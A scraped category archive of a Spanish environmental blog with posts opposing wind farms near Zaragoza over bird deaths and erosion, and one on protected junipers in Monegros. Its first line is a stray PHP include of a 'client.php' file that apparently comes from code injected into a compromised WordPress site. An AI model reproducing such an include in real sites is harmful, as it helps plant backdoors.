@include( ABSPATH . WPINC . '/client.php'); Barracuda » Estepas

Barracuda

Posts archivados en la categoría Estepas

AMENAZA DE ATENTADO EÓLICO EN TORRERO

17th febrero 2021 | Atentados ecológicos,Estepas,Eólica

cartel

Los proyectos del parque eólico Montañés en el Monte de Torrero y el contiguo parque eólico El Coto, ambos en el corazón de la estepa sur del término de Zaragoza amenazan la conservación de una zona de alto valor ecológico, tanto por la presencia de los aerogeneradores como por los desmontes, caminos, subestaciones y tendidos eléctricos que conllevan.

cartel

Ubicación de algunas máquinas y línea eléctrica del PE Montañés

Tanto el PE Montañés por ubicarse entre el emblemático cabezo de Las Zorras y el barranco del Montañés, como PE El Coto afectan a suelos con comunidades vegetales catalogadas como hábitats prioritarios según la Directiva Hábitats, además de albergar territorios de rocín o alondra ricotí y ser zona de intenso paso y presencia continua de aves rapaces.

La alondra ricotí o rocín es extremadamente sensible a la alteración de su territorio y se ha demostrado incompatible con la proximidad de aerogeneradores. Las aves rapaces son víctimas directas de los aerogeneradores como sucede en los parques eólicos contiguos de Acampo Armijo y de La Plana.

Lo grave del problema es que la zona es una importante área de invernada de rapaces como milano real, águila real y águila perdicera y es zona de tránsito de las cigüeñas y buitres y milanos que acuden al vertedero del PTR.

buitre leonado

Buitre leonado abatido en PE Los Labrados. Zaragoza

El PE Montañés lo promueve una sociedad limitada creada recientemente y domiciliada en Cuarte de Huerva.

cartel

Fuente: eInforma

cartel

Fuente: eInforma

Anímate a hacer un comentario

VIAJE AL INFIERNO: PARQUE EÓLICO ROMERALES 2

12th febrero 2021 | Atentados ecológicos,Estepas,Eólica,Política y Sociedad

parque eólico

Máquinas nº 1 y nº 2 desde la A-68. La Cartuja Baja, Zaragoza

El parque eólico Romerales II se ha construido en el Acampo del Marqués en el TM de Zaragoza capital junto al barrio de La Cartuja Baja, en la margen derecha del Canal Imperial, y comenzó a funcionar a finales de 2020. Es la ampliación del parque eólico Romerales I, en la misma zona, dentro de la estratagema de los promotores de fragmentar los proyectos en subproyectos que no alcanzan los 50 MW para evitar una evaluación rigurosa de los impactos acumulativos.

El PE Romerales I fue promovido por Alectoris Energía Sostenible 1, S.L. (ver RESOLUCIÓN de 1 de agosto de 2018, del Instituto Aragonés de Gestión Ambiental, por la que se formula la declaración de impacto ambiental del proyecto de Parque Eólico “Romerales 1″, de 49,4 kW, en el término municipal de Zaragoza, promovido por Alectoris Energía Sostenible 1, S.L. (Número Expte. INAGA 500201/01/2018/05446) en BOA nº 174 del 07/09/2018.

El PE Romerales II fue promovido por Alectoris Energía Sostenible 3, S. L. (ver RESOLUCIÓN de 2 de agosto de 2018, del Instituto Aragonés de Gestión Ambiental, por la que se formula la declaración de impacto ambiental del proyecto de Parque Eólico “Romerales 2″ y SET “Romerales 2″, de 49,4 kW, en el término municipal de Zaragoza, promovido por Alectoris Energía Sostenible 3, S.L. (Número Expte. INAGA 500201/01/2018/05447) en BOA nº 174 del 07/09/2018).

Los parques eólicos Romerales I y II de trece máquinas cada uno de 3,8 MW de potencia unitaria y que explota Repsol, se ubican en un ambiente de colinas de yesos con vegetación esteparia de matorral gipsófilo de alto valor ecológico.

parque eólico

Máquina nº 2 y pista de acceso a la misma

Venimos denunciando habitualmente en estas páginas la intensa mortalidad que causan en general los aerogeneradores durante su funcionamiento, pero analizaremos en esta ocasión otro de los aspectos no menos graves de las instalaciones eólicas como es la profunda e irreversible transformación del suelo que provocan las obras para asentar las máquinas. Tomaremos el ejemplo del parque eólico Romerales II.

parque eólico

Pista de acceso a máquina nº 2

Las máquinas, por el gran tamaño que alcanzan tanto los fustes como las palas, necesitan de unas enormes excavaciones para instalar la base que sustentará las torres, las cuales se ven sometidas a una enorme tensión por la fuerza del viento. Se necesitan unos accesos desmesurados por donde trasladar las palas (65 m de longitud) y los vehículos y grúas que los portan y colocan. Todo ello conlleva una ingente excavación.

parque eólico

Desmontes para pista de acceso a máquina nº 2

Además, para enterrar los kilométricos cableados de cada parque se precisa toda una red de zanjas las cuales necesitan también de más excavaciones: Las zanjas para cables de media tensión, que tendrán una longitud total de 12.432 m [...] DIA PE Romerales II (BOA 174 del 07/09/2018).

parque eólico

Desmonte para máquina nº 2

Como se ve, los movimientos de tierra, con la alteración brutal del terreno ocasionan la destrucción de los perfiles del terreno, originan desmontes y taludes que son vías de erosión. Esto, en un territorio semiárido es de una gravedad extrema, máxime cuando uno de los tradicionales problemas de Aragón es la erosión.

[...] Más de la mitad del territorio aragonés está afectado por un nivel de erosión preocupante, un proceso que es especialmente significativo en unas 600.000 hectáreas –el 12% de la superficie de la Comunidad–, donde se registra una “erosión grave”. Así lo destacó ayer a Efe el director general del Medio Natural del Gobierno de Aragón, Alberto Contreras. Contreras explicó que la degradación del suelo fértil se debe a las aguas, el viento u otros agentes y añadió se ha convertido en uno de los principales problemas medioambientales que afectan a Aragón.[...] El Periódico de Aragón 2003.09.02

parque eólico

Excavación para máquina nº 2. Máquina nº 1 al fondo

Las excavaciones y desmontes, la apertura o ampliación de caminos y la creación de plataformas de montaje implican, además, la pérdida de vegetación natural y de suelo fértil, lo que se conoce como desertificación. Durante años nos han venido alertando de que uno de los principales problemas de España y de Aragón especialmente es la erosión, pero esto no parece importar cuando se trata de ampliar polígonos indutriales, carreteras y montar parques eólicos.

[...] Más de la cuarta parte del suelo de Aragón está afectada por procesos de desertificación de caráctar alto o muy alto, según los datos difundidos ayer por el Ministerio de Medio Ambiente. El 28,66% de la superficie de la comunidad, es decir, 13.676 kilómetros cuadrados se encuentra en esta situación. [...] otros 24.556 kilómetros cuadrados –el 51,46% del suelo– padecen riesgos de desertificación de carácter medio o bajo. Así, una de cada cuatro hectáreas de suelo aragonés se encuentran amenazadas por este fenómeno.

La desertización es un proceso de pérdida de fertilidad del suelo por la combinación de varios agentes, entre ellos el clima y la acción del hombre. Los principales procesos de degradación son la erosión, la pérdida de vegetación natural y el deterioro de las propiedades físicas, químicas y biológicas.[...] El Periódico de Aragón 2005.06.17

parque eólico

Impacto de la obra sobre el terreno. Antena de medición (A) y máquinas 1 y 2

A los responsables del departamento de Industria con el consejero Arturo Aliaga López al frente, los problemas ambientales como la erosión les importan muy poco porque sólo ven desarrollo cuando hay metros cúbicos de excavación, de hormigón o toneladas de acero o kilovatios de por medio y públicamente ha manifestado más de una vez el entusiasmo que le provocan las grandes cifras referidas a estos elementos. Igualmente, al Director General de Enrgía y Minas Sergio Breto Asensiotampoco le ha parecido mal esta instalación cuando se ha autorizado bajo su mandato. No obstante, en el departamento de Medio Ambiente debería detectarse otra sensibilidad. Pero no, para con la eólica, el director del INAGA, Jesús Lobera Mariel (en el cargo desde 2015), es muy tolerante en este aspecto también y autoriza aberraciones como los parques eólicos Romerales I y Romerales II.

parque eólico

Vías de erosión en el talud de la pista acceso a máquina nº 1

En resumen, una tecnología que es mortífera con aves y murciélagos, que destruye el suelo y modifica el territorio tan drástica e irreversiblemente, mal puede calificársela de ecológica, verde o sostenible.

Anímate a hacer un comentario

LAS SABINAS DE MONEGROS TEMEN A DPZ

19th enero 2021 | Atentados ecológicos,Biodiversidad,Estepas,Política y Sociedad

sabina blanca

Amigos de la Tierra Aragón se ha dirigido a la Diputación de Zaragoza transmitiendo su preocupación por la suerte que corren las sabinas que jalonan la carretera CV-8 entre Osera y Monegrillo, en la comarca de Los Monegros, ante las inminentes obras de ampliación del tramo que falta por mejorar de la misma.

La preocupación se basa en la experiencia previa, debido a las obras del primer tramo en 2017, las cuales se llevaron por delante varias decenas de venerables sabinas blancas.

La sabina albar o sabina blanca (Juniperus thurifera) del valle del Ebro es una población protegida en la categoría “de interés especial” en el Catálogo de Especies Amenazadas de Aragón (aprobado por Decreto 49/1995, de 28 de marzo, del Gobierno de Aragón, BOA 7-4-1995, y modificado por Orden de 4 de marzo de 2004, del Departamento de Medio Ambiente, BOA 22-3-2004, y por Decreto 181/2005, de 6 de septiembre, BOA 23-9-2005).

La sabina blanca es una especie del grupo de las gimnospermas, de crecimiento muy lento y que es la única especie de porte arbóreo capaz de crecer en la estepa semiárida del valle del Ebro, de ahí su interés.

sabina blanca

Amigos de la Tierra Aragón se ha dirigido hace varios días, por correo electrónico, a Presidencia de DPZ y al servicio de Vialidad y Obras pero hasta ahora no ha obtenido respuesta ni acuse de recibo.

sabina blanca

La documentación a la que Amigos de la Tierra ha tenido acceso por ahora consiste en una declaración de impacto ambiental (DIA) de 2012 por la que INAGA imponía determinadas condiciones a la obra, DIA que caducaba a los dos años, por lo que se cuestiona legalidad de las obras de 2017. No obstante, la DIA de INAGA sólo contemplaba preservar las sabinas para su transplante, aspecto más que dudoso de poderse llevar a cabo con esta especie -hay que tener en cuenta que INAGA tiene muy pocos días lúcidos cuando redacta sus resoluciones- pero las máquinas arrancaron directamente las sabinas.

[...]Vegetación

8. Se deberá salvaguardar y proteger los ejemplares de flora protegida o singular con méritos de conservación y de arbolado con características de singularidad, en especial los ejemplares de sabina albar (Juniperus thurifera) que se localizan en los márgenes de la carretera de pk 0+390 a pk 8+900, que pueden ser amenazados por la ejecución del proyecto. La vegetación a proteger o salvaguardar se aislará y protegerá con una valla perimetral señalizadora, prohibiendo el acceso de personas y maquinaria.

9. Los ejemplares de flora catalogada afectados finalmente por la obra se determinarán y señalizarán en el replanteo de la misma por el responsable ambiental en compañía de un APN de la zona. La traslocación se realizará en condiciones óptimas de supervivencia y se realizará un seguimiento posterior de las plantaciones.[...] Resolución del Instituto Aragonés de Gestión Ambiental de fecha 11 de Junio de 2012. (Expediente INAGA 500201/01/2011/01207).

Al parecer, el desaguisado de la vez anterior se intentó subsanar haciendo una plantación en un monte de Monegrillo, pero hasta ahora se desconoce si la misma se llevó a cabo, con qué especies, y el control y seguimiento que ha habido.

Se desconoce también si existe una nueva DIA para las obras que se pretenden iniciar y si ha mejorado la sensibilidad de los planificadores y ejecutores de las obras públicas, en DPZ en este caso, porque ya se criticaron también los “excesos” de DPZ en la carretera de Valmadrid, incluso con una DIA muy amigable para las máquinas (ver: Destrucción del Alto de Valdescalera/Barracuda, 2016).

1 lector ha dado su opinión

MILANO REAL ABATIDO POR LA MERCANTIL BRIAL

17th enero 2021 | Atentados ecológicos,Aves,Estepas,Eólica

milanoo real

Milano real abatido en PE Los Cierzos. Gallur, Zaragoza © ANSAR

Esta tarde, naturalistas aragoneses han hallado el cadáver de un milano real (Milvus milvus) abatido bajo la máquina nº 2 del parque eólico Los Cierzos ubicado en los términos de Gallur y Magallón (Zaragoza, Aragón, España).

El parque eólico Los Cierzos consta de seis máquinas y está promovido por Energías Eólicas y Ecológicas 53, S.L. empresa del grupo aragonés Brial. Al igual que el parque eólico La Nava, promovido por la empresa 8 metros por segundo S.L. y Tinajeros, promovido por la empresa Saggita Ventum S.L., también del Grupo Brial y todos en la misma comarca.

El milano real es una especie catalogada en peligro de extinción en España según Real Decreto 139/2011, de 4 de febrero, para el desarrollo del Listado de Especies Silvestres en Régimen de Protección Especial y del Catálogo Español de Especies Amenazadas. Igual nivel de protección que el quebrantahuesos, por ejemplo. Los gobiernos invierten por ello recursos económicos y medios humanos y materiales en recuperar la especie. El Gobierno de Aragón, incluso alardea de su programa de cría en cautividad, pero luego autoriza parques eólicos que son auténticos mataderos de aves y murciélagos.

brial

Brial propaganda, junio 2020

brial

Brial propaganda, junio 2020

Los parque eólicos de Brial se significan por la alta mortalidad de aves y quirópteros que ocasionan, como no podía ser de otra forma. La empresa, no obstante, invierte bastante en lavado de imagen.

Anímate a hacer un comentario


ÚLTIMOS COMENTARIOS

LO MÁS RECIENTE

LO MÁS VISITADO

Tienda Barracuda

ARTÍCULOS POR CATEGORÍAS

CALENDARIO DE ARTÍCULOS

febrero 2021
L M X J V S D
« ene    
1234567
891011121314
15161718192021
22232425262728

ARTÍCULOS POR MESES

PÁGINAS